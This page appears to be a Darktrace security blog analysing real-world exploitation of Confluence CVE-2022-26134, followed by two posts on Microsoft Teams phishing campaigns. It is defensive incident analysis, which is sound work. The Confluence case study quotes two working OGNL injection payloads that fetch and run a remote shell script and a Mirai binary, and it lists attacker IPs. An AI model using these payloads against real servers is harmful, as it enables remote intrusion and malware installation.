Blog

Dentro del SOC

Confluence CVE-2022-26134 Zero-Day: Detection & Guidance

Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
12
Jun 2022
12
Jun 2022
Stay informed with Darktrace's blog on detection and guidance for the Confluence CVE-2022-26134 zero-day vulnerability. Learn how to protect your systems.

Summary

  • CVE-2022-26134 is an unauthenticated OGNL injection vulnerability which allows threat actors to execute arbitrary code on Atlassian Confluence Server or Data Centre products (not Cloud).
  • Atlassian has released several patches and a temporary mitigation in their security advisory. This has been consistently updated since the emergence of the vulnerability.
  • Darktrace detected and responded to an instance of exploitation in the first weekend of widespread exploits of this CVE.

Introducción

Looking forwards to 2022, the security industry expressed widespread concerns around third-party exposure and integration vulnerabilities.[1] Having already seen a handful of in-the-wild exploits against Okta (CVE-2022-22965) and Microsoft (CVE-2022-30190), the start of June has now seen another critical remote code execution (RCE) vulnerability affecting Atlassian’s Confluence range. Confluence is a popular wiki management and knowledge-sharing platform used by enterprises worldwide. This latest vulnerability (CVE-2022-26134) affects all versions of Confluence Server and Data Centre.[2] This blog will explore the vulnerability itself, an instance which Darktrace detected and responded to, and additional guidance for both the public at large and existing Darktrace customers.

Exploitation of this CVE occurs through an injection vulnerability which enables threat actors to execute arbitrary code without authentication. Injection-type attacks work by sending data to web applications in order to cause unintended results. In this instance, this involves injecting OGNL (Object-Graph Navigation Language) expressions to Confluence server memory. This is done by placing the expression in the URI of a HTTP request to the server. Threat actors can then plant a webshell which they can interact with and deploy further malicious code, without having to re-exploit the server. It is worth noting that several proofs-of-concept of this exploit have also been seen online.[3] As a widely known and critical severity exploit, it is being indiscriminately used by a range of threat actors.[4]

Atlassian advises that sites hosted on Confluence Cloud (run via AWS) are not vulnerable to this exploit and it is restricted to organizations running their own Confluence servers.[2]

Case study: European media organization

The first detected in-the-wild exploit for this zero-day was reported to Atlassian as an out-of-hours attack over the US Memorial Day weekend.[5] Darktrace analysts identified a similar instance of this exploit only a couple of days later within the network of a European media provider. This was part of a wider series of compromises affecting the account, likely involving multiple threat actors. The timing was also in line with the start of more widespread public exploitation attempts against other organizations.[6]

On the evening of June 3, Darktrace’s Enterprise Immune System identified a new text/x-shellscript download for the curl/7.61.1 user agent on a company’s Confluence server. This originated from a rare external IP address, 194.38.20[.]166. It is possible that the initial compromise came moments earlier from 95.182.120[.]164 (a suspicious Russian IP) however this could not be verified as the connection was encrypted. The download was shortly followed by file execution and outbound HTTP involving the curl agent. A further download for an executable from 185.234.247[.]8 was attempted but this was blocked by Antigena Network’s Autonomous Response. Despite this, the Confluence server then began serving sessions using the Minergate protocol on a non-standard port. In addition to mining, this was accompanied by failed beaconing connections to another rare Russian IP, 45.156.23[.]210, which had not yet been flagged as malicious on VirusTotal OSINT (Figures 1 and 2).[7][8]

Figures 1 and 2: Unrated VirusTotal pages for Russian IPs connected to during minergate activity and failed beaconing — Darktrace identification of these IP’s involvement in the Confluence exploit occurred prior to any malicious ratings being added to the OSINT profiles

Minergate is an open crypto-mining pool allowing users to add computer hashing power to a larger network of mining devices in order to gain digital currencies. Interestingly, this is not the first time Confluence has had a critical vulnerability exploited for financial gain. September 2021 saw CVE-2021-26084, another RCE vulnerability which was also taken advantage of in order to install crypto-miners on unsuspecting devices.[9]

During attempted beaconing activity, Darktrace also highlighted the download of two cf.sh files using the initial curl agent. Further malicious files were then downloaded by the device. Enrichment from VirusTotal (Figure 3) alongside the URIs, identified these as Kinsing shell scripts.[10][11] Kinsing is a malware strain from 2020, which was predominantly used to install another crypto-miner named ‘kdevtmpfsi’. Antigena triggered a Suspicious File Block to mitigate the use of this miner. However, following these downloads, additional Minergate connection attempts continued to be observed. This may indicate the successful execution of one or more scripts.

Figure 3: VirusTotal confirming evidence of Kinsing shell download

More concrete evidence of CVE-2022-26134 exploitation was detected in the afternoon of June 4. The Confluence Server received a HTTP GET request with the following URI and redirect location:

/${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash’).start()”)}/

This is a likely demonstration of the OGNL injection attack (Figures 3 and 4). The ‘nashorn’ string refers to the Nashorn Engine which is used to interpret javascript code and has been identified within active payloads used during the exploit of this CVE. If successful, a threat actor could be provided with a reverse shell for ease of continued connections (usually) with fewer restrictions to port usage.[12] Following the injection, the server showed more signs of compromise such as continued crypto-mining and SSL beaconing attempts.

Figures 4 and 5: Darktrace Advanced Search features highlighting initial OGNL injection and exploit time

Following the injection, a separate exploitation was identified. A new user agent and URI indicative of the Mirai botnet attempted to utilise the same Confluence vulnerability to establish even more crypto-mining (Figure 6). Mirai itself may have also been deployed as a backdoor and a means to attain persistency.

Figure 6: Model breach snapshot highlighting new user agent and Mirai URI

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}/

Throughout this incident, Darktrace’s Proactive Threat Notification service alerted the customer to both the Minergate and suspicious Kinsing downloads. This ensured dedicated SOC analysts were able to triage the events in real time and provide additional enrichment for the customer’s own internal investigations and eventual remediation. With zero-days often posing as a race between threat actors and defenders, this incident makes it clear that Darktrace detection can keep up with both known and novel compromises.

A full list of model detections and indicators of compromise uncovered during this incident can be found in the appendix.

Darktrace coverage and guidance

From the Kinsing shell scripts to the Nashorn exploitation, this incident showcased a range of malicious payloads and exploit methods. Although signature solutions may have picked up the older indicators, Darktrace model detections were able to provide visibility of the new. Models breached covering kill chain stages including exploit, execution, command and control and actions-on-objectives (Figure 7). With the Enterprise Immune System providing comprehensive visibility across the incident, the threat could be clearly investigated or recorded by the customer to warn against similar incidents in the future. Several behaviors, including the mass crypto-mining, were also grouped together and presented by AI Analyst to support the investigation process.

Figure 7: Device graph showing a cluster of model breaches on the Confluence Server around the exploit event

On top of detection, the customer also had Antigena in active mode, ensuring several malicious activities were actioned in real time. Examples of Autonomous Response included:

  • Antigena / Network / External Threat / Antigena Suspicious Activity Block
  • Block connections to 176.113.81[.]186 port 80, 45.156.23[.]210 port 80 and 91.241.19[.]134 port 80 for one hour
  • Antigena / Network / External Threat / Antigena Suspicious File Block
  • Block connections to 194.38.20[.]166 port 80 for two hours
  • Antigena / Network / External Threat / Antigena Crypto Currency Mining Block
  • Block connections to 176.113.81[.]186 port 80 for 24 hours

Darktrace customers can also maximise the value of this response by taking the following steps:

  • Ensure Antigena Network is deployed.
  • Regularly review Antigena breaches and set Antigena to ‘Active’ rather than ‘Human Confirmation’ mode (otherwise customers’ security teams will need to manually trigger responses).
  • Tag Confluence Servers with Antigena External Threat, Antigena Significant Anomaly or Antigena All tags.
  • Ensure Antigena has appropriate firewall integrations.

For each of these steps, more information can be found in the product guides on our Customer Portal

Wider recommendations for CVE-2022-26134

On top of Darktrace product guidance, there are several encouraged actions from the vendor:

  • Atlassian recommends updates to the following versions where this vulnerability has been fixed: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.
  • For those unable to update, temporary mitigations can be found in the formal security advisory.
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.

Appendix

Darktrace model detections (for the discussed incident)

  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous File / EXE from Rare External Location
  • Anomalous File / Script from Rare External
  • Anomalous Server Activity / Possible Denial of Service Activity
  • Anomalous Server Activity / Rare External from Server
  • Compromise / Crypto Currency Mining Activity
  • Compromise / High Volume of Connections with Beacon Score
  • Compromise / Large Number of Suspicious Failed Connections
  • Compromise / SSL Beaconing to Rare Destination
  • Device / New User Agent

IoCs

Thanks to Hyeongyung Yeom and the Threat Research Team for their contributions.

Notas a pie de página

1. https://www.gartner.com/en/articles/7-top-trends-in-cybersecurity-for-2022

2. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. https://twitter.com/phithon_xg/status/1532887542722269184?cxt=HHwWgMCoiafG9MUqAAAA

4. https://twitter.com/stevenadair/status/1532768372911398916

5. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

6. https://www.cybersecuritydive.com/news/attackers-atlassian-confluence-zero-day-exploit/625032

7. https://www.virustotal.com/gui/ip-address/45.156.23.210

8. https://www.virustotal.com/gui/ip-address/176.113.81.186

9. https://securityboulevard.com/2021/09/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers

10. https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

11. https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d

12. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134

DENTRO DEL SOC
Darktrace son expertos de talla mundial en inteligencia de amenazas, caza de amenazas y respuesta a incidentes, y proporcionan apoyo al SOC las 24 horas del día a miles de clientes de Darktrace en todo el mundo. Inside the SOC está redactado exclusivamente por estos expertos y ofrece un análisis de los ciberincidentes y las tendencias de las amenazas, basado en la experiencia real sobre el terreno.
AUTOR
SOBRE EL AUTOR
Gabriel Few-Wiegratz
Head of Threat Intelligence Hub
Book a 1-1 meeting with one of our experts
share this article
CASOS DE USO
No se ha encontrado ningún artículo.
PRODUCTOS DESTACADOS
No se ha encontrado ningún artículo.
Cobertura básica
No se ha encontrado ningún artículo.

More in this series

No se ha encontrado ningún artículo.

Blog

Email

How to Protect your Organization Against Microsoft Teams Phishing Attacks

Default blog imageDefault blog image
21
May 2024

The problem: Microsoft Teams phishing attacks are on the rise

Around 83% of Fortune 500 companies rely on Microsoft Office products and services1, with Microsoft Teams and Microsoft SharePoint in particular emerging as critical platforms to the business operations of the everyday workplace. Researchers across the threat landscape have begun to observe these legitimate services being leveraged more and more by malicious actors as an initial access method.

As Teams becomes a more prominent feature of the workplace many employees rely on it for daily internal and external communication, even surpassing email usage in some organizations. As Microsoft2 states, "Teams changes your relationship with email. When your whole group is working in Teams, it means you'll all get fewer emails. And you'll spend less time in your inbox, because you'll use Teams for more of your conversations."

However, Teams can be exploited to send targeted phishing messages to individuals either internally or externally, while appearing legitimate and safe. Users might receive an external message request from a Teams account claiming to be an IT support service or otherwise affiliated with the organization. Once a user has accepted, the threat actor can launch a social engineering campaign or deliver a malicious payload. As a primarily internal tool there is naturally less training and security awareness around Teams – due to the nature of the channel it is assumed to be a trusted source, meaning that social engineering is already one step ahead.

Screenshot of a Microsoft Teams message request from a Midnight Blizzard-controlled account (courtesy of Microsoft)
Figure 1: Screenshot of a Microsoft Teams message request from a Midnight Blizzard-controlled account (courtesy of Microsoft)

Microsoft Teams Phishing Examples

Microsoft has identified several major phishing attacks using Teams within the past year.

In July 2023, Microsoft announced that the threat actor known as Midnight Blizzard – identified by the United States as a Russian state-sponsored group – had launched a series of phishing campaigns via Teams with the aim of stealing user credentials. These attacks used previously compromised Microsoft 365 accounts and set up new domain names that impersonated legitimate IT support organizations. The threat actors then used social engineering tactics to trick targeted users into sharing their credentials via Teams, enabling them to access sensitive data.  

At a similar time, threat actor Storm-0324 was observed sending phishing lures via Teams containing links to malicious SharePoint-hosted files. The group targeted organizations that allow Teams users to interact and share files externally. Storm-0324’s goal is to gain initial access to hand over to other threat actors to pursue more dangerous follow-on attacks like ransomware.

For a more in depth look at how Darktrace stops Microsoft Teams phishing read our blog: Don’t Take the Bait: How Darktrace Keeps Microsoft Teams Phishing Attacks at Bay

The market: Existing Microsoft Teams security solutions are insufficient

Microsoft’s native Teams security focuses on payloads, namely links and attachments, as the principal malicious component of any phishing. These payloads are relatively straightforward to detect with their experience in anti-virus, sandboxing, and IOCs. However, this approach is unable to intervene before the stage at which payloads are delivered, before the user even gets the chance to accept or deny an external message request. At the same time, it risks missing more subtle threats that don’t include attachments or links – like early stage phishing, which is pure social engineering – or completely new payloads.

Equally, the market offering for Teams security is limited. Security solutions available on the market are always payload-focused, rather than taking into account the content and context in which a link or attachment is sent. Answering questions like:

  • Does it make sense for these two accounts to speak to each other?
  • Are there any linguistic indicators of inducement?

Furthermore, they do not correlate with email to track threats across multiple communication environments which could signal a wider campaign. Effectively, other market solutions aren’t adding extra value – they are protecting against the same types of threats that Microsoft is already covering by default.

The other aspect of Teams security that native and market solutions fail to address is the account itself. As well as focusing on Teams threats, it’s important to analyze messages to understand the normal mode of communication for a user, and spot when a user’s Teams activity might signal account takeover.

The solution: How Darktrace protects Microsoft Teams against sophisticated threats

With its biggest update to Darktrace/Email ever, Darktrace now offers support for Microsoft Teams. With that, we are bringing the same AI philosophy that protects your email and accounts to your messaging environment.  

Our Self-Learning AI looks at content and context for every communication, whether that’s sent in an email or Teams message. It looks at actual user behavior, including language patterns, relationship history of sender and recipient, tone and payloads, to understand if a message poses a threat. This approach allows Darktrace to detect threats such as social engineering and payloadless attacks using visibility and forensic capabilities that Microsoft security doesn’t currently offer, as well as early symptoms of account compromise.  

Unlike market solutions, Darktrace doesn’t offer a siloed approach to Teams security. Data and signals from Teams are shared across email to inform detection, and also with the wider Darktrace ActiveAI security platform. By correlating information from email and Teams with network and apps security, Darktrace is able to better identify suspicious Teams activity and vice versa.  

Interested in the other ways Darktrace/Email augments threat detection? Read our latest blog on how improving the quality of end-user reporting can decrease the burden on the SOC. To find our more about Darktrace's enduring partnership with Microsoft, click here.

References

[1] Essential Microsoft Office Statistics in 2024

[2] Microsoft blog, Microsoft Teams and email, living in harmony, 2024

Continue reading
About the author
Carlos Gray
Product Manager

Blog

Dentro del SOC

Don’t Take the Bait: How Darktrace Keeps Microsoft Teams Phishing Attacks at Bay

Default blog imageDefault blog image
20
May 2024

Social Engineering in Phishing Attacks

Faced with increasingly cyber-aware endpoint users and vigilant security teams, more and more threat actors are forced to think psychologically about the individuals they are targeting with their phishing attacks. Social engineering methods like taking advantage of the human emotions of their would-be victims, pressuring them to open emails or follow links or face financial or legal repercussions, and impersonating known and trusted brands or services, have become common place in phishing campaigns in recent years.

Phishing with Microsoft Teams

The malicious use of the popular communications platform Microsoft Teams has become widely observed and discussed across the threat landscape, with many organizations adopting it as their primary means of business communication, and many threat actors using it as an attack vector. As Teams allows users to communicate with people outside of their organization by default [1], it becomes an easy entry point for potential attackers to use as a social engineering vector.

In early 2024, Darktrace/Apps™ identified two separate instances of malicious actors using Microsoft Teams to launch a phishing attack against Darktrace customers in the Europe, the Middle East and Africa (EMEA) region. Interestingly, in this case the attackers not only used a well-known legitimate service to carry out their phishing campaign, but they were also attempting to impersonate an international hotel chain.

Despite these attempts to evade endpoint users and traditional security measures, Darktrace’s anomaly detection enabled it to identify the suspicious phishing messages and bring them to the customer’s attention. Additionally, Darktrace’s autonomous response capability, was able to follow-up these detections with targeted actions to contain the suspicious activity in the first instance.

Darktrace Coverage of Microsoft Teams Phishing

Chats Sent by External User and Following Actions by Darktrace

On February 29, 2024, Darktrace detected the presence of a new external user on the Software-as-a-Service (SaaS) environment of an EMEA customer for the first time. The user, “REDACTED@InternationalHotelChain[.]onmicrosoft[.]com” was only observed on this date and no further activities were detected from this user after February 29.

Later the same day, the unusual external user created its first chat on Microsoft Teams named “New Employee Loyalty Program”. Over the course of around 5 minutes, the user sent 63 messages across 21 different chats to unique internal users on the customer’s SaaS platform. All these chats included the ‘foreign tenant user’ and one of the customer’s internal users, likely in an attempt to remain undetected. Foreign tenant user, in this case, refers to users without access to typical internal software and privileges, indicating the presence of an external user.

Darktrace’s detection of unusual messages being sent by a suspicious external user via Microsoft Teams.
Figure 1: Darktrace’s detection of unusual messages being sent by a suspicious external user via Microsoft Teams.
Advanced Search results showing the presence of a foreign tenant user on the customer’s SaaS environment.
Figure 2: Advanced Search results showing the presence of a foreign tenant user on the customer’s SaaS environment.

Darktrace identified that the external user had connected from an unusual IP address located in Poland, 195.242.125[.]186. Darktrace understood that this was unexpected behavior for this user who had only previously been observed connecting from the United Kingdom; it further recognized that no other users within the customer’s environment had connected from this external source, thereby deeming it suspicious. Further investigation by Darktrace’s analyst team revealed that the endpoint had been flagged as malicious by several open-source intelligence (OSINT) vendors.

External Summary highlighting the rarity of the rare external source from which the Teams messages were sent.
Figure 3: External Summary highlighting the rarity of the rare external source from which the Teams messages were sent.

Following Darktrace’s initial detection of these suspicious Microsoft Teams messages, Darktrace's autonomous response was able to further support the customer by providing suggested mitigative actions that could be applied to stop the external user from sending any additional phishing messages.

Unfortunately, at the time of this attack Darktrace's autonomous response capability was configured in human confirmation mode, meaning any autonomous response actions had to be manually actioned by the customer. Had it been enabled in autonomous response mode, it would have been able promptly disrupt the attack, disabling the external user to prevent them from continuing their phishing attempts and securing precious time for the customer’s security team to begin their own remediation procedures.

Darktrace autonomous response actions that were suggested following the ’Large Volume of Messages Sent from New External User’ detection model alert.
Figure 4: Darktrace autonomous response actions that were suggested following the ’Large Volume of Messages Sent from New External User’ detection model alert.

External URL Sent within Teams Chats

Within the 21 Teams chats created by the threat actor, Darktrace identified 21 different external URLs being sent, all of which included the domain "cloud-sharcpoint[.]com”. Many of these URLs had been recently established and had been flagged as malicious by OSINT providers [3]. This was likely an attempt to impersonate “cloud-sharepoint[.]com”, the legitimate domain of Microsoft SharePoint, with the threat actor attempting to ‘typo-squat’ the URL to convince endpoint users to trust the legitimacy of the link. Typo-squatted domains are commonly misspelled URLs registered by opportunistic attackers in the hope of gaining the trust of unsuspecting targets. They are often used for nefarious purposes like dropping malicious files on devices or harvesting credentials.

Upon clicking this malicious link, users were directed to a similarly typo-squatted domain, “InternatlonalHotelChain[.]sharcpoInte-docs[.]com”. This domain was likely made to appear like the SharePoint URL used by the international hotel chain being impersonated.

Redirected link to a fake SharePoint page attempting to impersonate an international hotel chain.
Figure 5: Redirected link to a fake SharePoint page attempting to impersonate an international hotel chain.

This fake SharePoint page used the branding of the international hotel chain and contained a document named “New Employee Loyalty Program”; the same name given to the phishing messages sent by the attacker on Microsoft Teams. Upon accessing this file, users would be directed to a credential harvester, masquerading as a Microsoft login page, and prompted to enter their credentials. If successful, this would allow the attacker to gain unauthorized access to a user’s SaaS account, thereby compromising the account and enabling further escalation in the customer’s environment.

Figure 6: A fake Microsoft login page that popped-up when attempting to open the ’New Employee Loyalty Program’ document.

This is a clear example of an attacker attempting to leverage social engineering tactics to gain the trust of their targets and convince them to inadvertently compromise their account. Many corporate organizations partner with other companies and well-known brands to offer their employees loyalty programs as part of their employment benefits and perks. As such, it would not necessarily be unexpected for employees to receive such an offer from an international hotel chain. By impersonating an international hotel chain, threat actors would increase the probability of convincing their targets to trust and click their malicious messages and links, and unintentionally compromising their accounts.

In spite of the attacker’s attempts to impersonate reputable brands, platforms, Darktrace/Apps was able to successfully recognize the malicious intent behind this phishing campaign and suggest steps to contain the attack. Darktrace recognized that the user in question had deviated from its ‘learned’ pattern of behavior by connecting to the customer’s SaaS environment from an unusual external location, before proceeding to send an unusually large volume of messages via Teams, indicating that the SaaS account had been compromised.

A Wider Campaign?

Around a month later, in March 2024, Darktrace observed a similar incident of a malicious actor impersonating the same international hotel chain in a phishing attacking using Microsoft Teams, suggesting that this was part of a wider phishing campaign. Like the previous example, this customer was also based in the EMEA region.  

The attack tactics identified in this instance were very similar to the previously example, with a new external user identified within the network proceeding to create a series of Teams messages named “New Employee Loyalty Program” containing a typo-squatted external links.

There were a few differences with this second incident, however, with the attacker using the domain “@InternationalHotelChainExpeditions[.]onmicrosoft[.]com” to send their malicious Teams messages and using differently typo-squatted URLs to imitate Microsoft SharePoint.

As both customers targeted by this phishing campaign were subscribed to Darktrace’s Proactive Threat Notification (PTN) service, this suspicious SaaS activity was promptly escalated to the Darktrace Security Operations Center (SOC) for immediate triage and investigation. Following their investigation, the SOC team sent an alert to the customers informing them of the compromise and advising urgent follow-up.

Conclusion

While there are clear similarities between these Microsoft Teams-based phishing attacks, the attackers here have seemingly sought ways to refine their tactics, techniques, and procedures (TTPs), leveraging new connection locations and creating new malicious URLs in an effort to outmaneuver human security teams and conventional security tools.

As cyber threats grow increasingly sophisticated and evasive, it is crucial for organizations to employ intelligent security solutions that can see through social engineering techniques and pinpoint suspicious activity early.

Darktrace’s Self-Learning AI understands customer environments and is able to recognize the subtle deviations in a device’s behavioral pattern, enabling it to effectively identify suspicious activity even when attackers adapt their strategies. In this instance, this allowed Darktrace to detect the phishing messages, and the malicious links contained within them, despite the seemingly trustworthy source and use of a reputable platform like Microsoft Teams.

Credit to Min Kim, Cyber Security Analyst, Raymond Norbert, Cyber Security Analyst and Ryan Traill, Threat Content Lead

Appendix

Darktrace Model Detections

SaaS Model

Large Volume of Messages Sent from New External User

SaaS / Unusual Activity / Large Volume of Messages Sent from New External User

Indicators of Compromise (IoCs)

IoC – Type - Description

https://cloud-sharcpoint[.]com/[a-zA-Z0-9]{15} - Example hostname - Malicious phishing redirection link

InternatlonalHotelChain[.]sharcpolnte-docs[.]com – Hostname – Redirected Link

195.242.125[.]186 - External Source IP Address – Malicious Endpoint

MITRE Tactics

Tactic – Technique

Phishing – Initial Access (T1566)

References

[1] https://learn.microsoft.com/en-us/microsoftteams/trusted-organizations-external-meetings-chat?tabs=organization-settings

[2] https://www.virustotal.com/gui/ip-address/195.242.125.186/detection

[3] https://www.virustotal.com/gui/domain/cloud-sharcpoint.com

Continue reading
About the author
Min Kim
Cyber Security Analyst
Our ai. Your data.

Elevate your cyber defenses with Darktrace AI

Inicie su prueba gratuita
Darktrace AI protecting a business from cyber threats.